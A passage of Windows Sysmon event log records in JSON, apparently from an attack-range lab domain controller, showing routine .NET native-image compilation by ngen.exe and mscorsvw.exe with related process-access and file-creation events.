C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010D4980F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-001068CA1000}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-001068CA1000}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:00.982\r\nProcessGuid: {E2A3D6B1-13A4-5F25-0000-001068CA1000}\r\nProcessId: 4880\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1310-0\\System.Xml.Serialization.dll\r\nCreationUtcTime: 2020-08-01 07:03:00.982","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:00.982","ProcessGuid":"{E2A3D6B1-13A4-5F25-0000-001068CA1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1310-0\\System.Xml.Serialization.dll","CreationUtcTime":"2020-08-01 07:03:00.982","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.013\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001077CD1000}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.013","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001077CD1000}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.013\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001077CD1000}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.013","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001077CD1000}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.013\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001077CD1000}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.013","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001077CD1000}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.060\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001028D11000}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.060","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001028D11000}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.060\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001028D11000}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.060","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001028D11000}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.060\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001028D11000}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.060","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001028D11000}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
